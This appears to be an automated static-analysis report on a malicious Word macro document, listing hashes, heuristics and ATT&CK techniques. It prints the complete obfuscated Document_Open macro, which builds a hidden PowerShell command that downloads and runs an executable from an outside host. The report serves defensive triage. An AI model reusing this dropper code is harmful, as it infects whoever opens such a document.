Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ddc8cc39a11b7fa…

MALICIOUS

Office (OLE)

120.0 KB Created: 2017-02-06 16:53:00 Authoring application: Microsoft Office Word First seen: 2017-02-27
MD5: 8832cec2cb7f4262d0668d3c67a8e2d1 SHA-1: 3540f61a215873d9885e4160da6fd4797404bec7 SHA-256: 5ddc8cc39a11b7fabd7aba54b8246550756e6437aa80633ed8aad9603ac871e4
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The macro references the WinExec API, indicating an attempt to execute a command. This suggests the document is designed to download and execute a second-stage payload, likely for further system compromise.

Heuristics 6

  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    qbcolorBinaryGet = "vbscript.regexp"
    Set xorAscEvent = CreateObject(qbcolorBinaryGet)
    xorAscEvent.Global = True
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
    Sub Document_Open()
    eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6046 bytes
SHA-256: e5ed44ff03108f8dc8c96b6fc552d20f3b26a9d53baa749b3d1a651493a4d3d9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
91 of 147 identifiers look randomly generated (e.g. 'BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWda') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
rndIsdateCcur = typeofDateserialIsdate(" BWdaA-BWdaAEBWdaArBWdaArBWdaAoBWdaArBWdaAABWdaAcBWdaAtBWdaAiBWdaAoBWdaAnBWdaA BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWdaAlBWdaAyBWdaAcBWdaAoBWdaAnBWdaAtBWdaAiBWdaAnBWdaAuBWdaAeBWdaA;BWdaAiBWdaAfBWdaA(BWdaA!BWdaA$BWdaApBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA)BWdaA{BWdaASBWdaAtBWdaAaBWdaArBWdaAtBWdaA-BWdaAPBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA BWdaA-BWdaAWBWdaAiBWdaAnBWdaAdBWdaAoBWdaAwBWdaASBWdaAtBWdaAyBWdaAlBWdaAeBWdaA BWdaAhBWdaAiBWdaAdBWdaAdBWdaAeBWdaAnBWdaA", "BWdaA")
LdefdblL = typeofDateserialIsdate("bxnmucxnmulxnmuixnmuexnmunxnmutxnmu.xnmuDxnmuoxnmuwxnmunxnmulxnmuoxnmuaxnmudxnmuFxnmuixnmulxnmuexnmu(xnmu$xnmuuxnmurxnmulxnmu.xnmuTxnmuoxnmuSxnmutxnmurxnmuixnmunxnmugxnmu(xnmu)xnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmu$xnmuwxnmusxnmucxnmurxnmuixnmupxnmutxnmu.xnmuRxnmuexnmugxnmuWxnmurxnmuixnmutxnmuexnmu(xnmu$xnmuhxnmukxnmuexnmuyxnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmuSxnmu", "xnmu")
sendkeysCvarOptional = typeofDateserialIsdate("tytPOkaytPOkrytPOktytPOk-ytPOkSytPOklytPOkeytPOkeytPOkpytPOk ytPOk-ytPOkmytPOk ytPOk$ytPOksytPOklytPOkeytPOkeytPOkpytPOk;ytPOkSytPOktytPOkaytPOkrytPOktytPOk-ytPOkPytPOkrytPOkoytPOkcytPOkeytPOksytPOksytPOk ytPOk-ytPOkWytPOkiytPOknytPOkdytPOkoytPOkwytPOkSytPOktytPOkyytPOklytPOkeytPOk ytPOkhytPOkiytPOkdytPOkdytPOkeytPOknytPOk ytPOk-ytPOkFytPOkiytPOklytPOkeytPOkPytPOkaytPOktytPOkhytPOk ytPOk'ytPOkeytPOkvytPOkeytPOknytPOktytPOkvytPOkwytPOkrytPOk.ytPOkeytPOkxytPOkeytPOk", "ytPOk")
byrefCbyteResume = typeofDateserialIsdate("'ggG4;ggG4SggG4tggG4aggG4rggG4tggG4-ggG4SggG4lggG4eggG4eggG4pggG4 ggG4-ggG4mggG4 ggG4$ggG4sggG4lggG4eggG4eggG4pggG4;ggG4$ggG4wggG4sggG4cggG4rggG4iggG4pggG4tggG4.ggG4RggG4eggG4gggG4DggG4eggG4lggG4eggG4tggG4eggG4(ggG4$ggG4hggG4kggG4eggG4yggG4)ggG4;ggG4$ggG4pggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4=ggG4 ggG4GggG4eggG4tggG4-ggG4PggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4$ggG4nggG4aggG4mggG4eggG4", "ggG4")
GexitG = typeofDateserialIsdate(" nHKxC=nHKxC nHKxC'nHKxChnHKxCtnHKxCtnHKxCpnHKxCsnHKxC:nHKxC/nHKxC/nHKxCgnHKxConHKxCvnHKxC-nHKxCinHKxCnnHKxCvnHKxConHKxCinHKxCcnHKxCenHKxCsnHKxC.nHKxCinHKxCnnHKxCfnHKxConHKxC/nHKxCjnHKxConHKxCbnHKxCsnHKxC/nHKxCnnHKxCenHKxCunHKxClnHKxCdnHKxCrnHKxC.nHKxCenHKxCxnHKxCenHKxC'nHKxC.nHKxCSnHKxCpnHKxClnHKxCinHKxCtnHKxC(nHKxC'nHKxC,nHKxC'nHKxC)nHKxC;nHKxC$nHKxCnnHKxCanHKxCmnHKxCenHKxC nHKxC=nHKxC nHKxC$nHKxCrnHKxCanHKxCnnHKxCdnHKxConHKxCmnHKxC.nHKxCnnHKxCenHKxCxnHKxCtnHKxC", "nHKxC")
curdirCstrCreateobject = typeofDateserialIsdate("sQglW0sQglW0eQglW0sQglW0\QglW0mQglW0sQglW0cQglW0fQglW0iQglW0lQglW0eQglW0\QglW0sQglW0hQglW0eQglW0lQglW0lQglW0\QglW0oQglW0pQglW0eQglW0nQglW0\QglW0cQglW0oQglW0mQglW0mQglW0aQglW0nQglW0dQglW0\QglW0'QglW0;QglW0$QglW0sQglW0lQglW0eQglW0eQglW0pQglW0 QglW0=QglW0 QglW03QglW00QglW00QglW00QglW0;QglW0fQglW0oQglW0rQglW0eQglW0aQglW0cQglW0hQglW0(QglW0$QglW0uQglW0rQglW0lQglW0 QglW0iQglW0nQglW0 QglW0$QglW0uQglW0rQglW0lQglW0sQglW0)QglW0{QglW0tQglW0rQglW0yQglW0{QglW0$QglW0wQglW0eQglW0", "QglW0")
meOptionEach = typeofDateserialIsdate("paRVfoaRVfwaRVfeaRVfraRVfsaRVfhaRVfeaRVflaRVflaRVf aRVf-aRVfWaRVfiaRVfnaRVfdaRVfoaRVfwaRVfSaRVftaRVfyaRVflaRVfeaRVf aRVfHaRVfiaRVfdaRVfdaRVfeaRVfnaRVf aRVf$aRVfwaRVfsaRVfcaRVfraRVfiaRVfpaRVftaRVf aRVf=aRVf aRVfnaRVfeaRVfwaRVf-aRVfoaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVf-aRVfCaRVfoaRVfmaRVfOaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVfWaRVfSaRVfcaRVfraRVfiaRVfpaRVftaRVf.aRVfSaRVfhaRVfeaRVflaRVflaRVf;aRVf", "aRVf")
koptionk = typeofDateserialIsdate("$UfRtTwUfRtTeUfRtTbUfRtTcUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTSUfRtTyUfRtTsUfRtTtUfRtTeUfRtTmUfRtT.UfRtTNUfRtTeUfRtTtUfRtT.UfRtTWUfRtTeUfRtTbUfRtTCUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT;UfRtT$UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT;UfRtT$UfRtTuUfRtTrUfRtTlUfRtTsUfRtT", "UfRtT")
clngSecondArray = typeofDateserialIsdate("(SAmO7K1SAmO7K,SAmO7K SAmO7K6SAmO7K5SAmO7K5SAmO7K3SAmO7K6SAmO7K)SAmO7K;SAmO7K$SAmO7KpSAmO7KaSAmO7KtSAmO7KhSAmO7K SAmO7K=SAmO7K SAmO7K$SAmO7KeSAmO7KnSAmO7KvSAmO7K:SAmO7KtSAmO7KeSAmO7KmSAmO7KpSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K\SAmO7K'SAmO7K SAmO7K+SAmO7K SAmO7K$SAmO7KnSAmO7KaSAmO7KmSAmO7KeSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K.SAmO7KeSAmO7KxSAmO7KeSAmO7K'SAmO7K;SAmO7K$SAmO7KhSAmO7KkSAmO7KeSAmO7KySAmO7K SAmO7K=SAmO7K SAmO7K'SAmO7KHSAmO7KKSAmO7KCSAmO7KUSAmO7K\SAmO7KSSAmO7KoSAmO7KfSAmO7KtSAmO7KwSAmO7KaSAmO7KrSAmO7KeSAmO7K\SAmO7KCSAmO7KlSAmO7KaSAmO7K", "SAmO7K")
Dim caseSubCdec As String
Dim mxorm As Integer
mxorm = 0
caseSubCdec = meOptionEach & koptionk & GexitG & clngSecondArray & curdirCstrCreateobject & LdefdblL & sendkeysCvarOptional & byrefCbyteResume & rndIsdateCcur & eofMeFix
Call WinExec(caseSubCdec, mxorm)
End Sub
Function typeofDateserialIsdate(jpublishreportj As String, dwidthd As String) As String
Dim xorAscEvent As Object
Dim qbcolorBinaryGet As String
Dim doeventsSpaceError As String
qbcolorBinaryGet = "vbscript.regexp"
Set xorAscEvent = CreateObject(qbcolorBinaryGet)
xorAscEvent.Global = True
xorAscEvent.Pattern = dwidthd
doeventsSpaceError = xorAscEvent.Replace(jpublishreportj, "")
typeofDateserialIsdate = doeventsSpaceError
End Function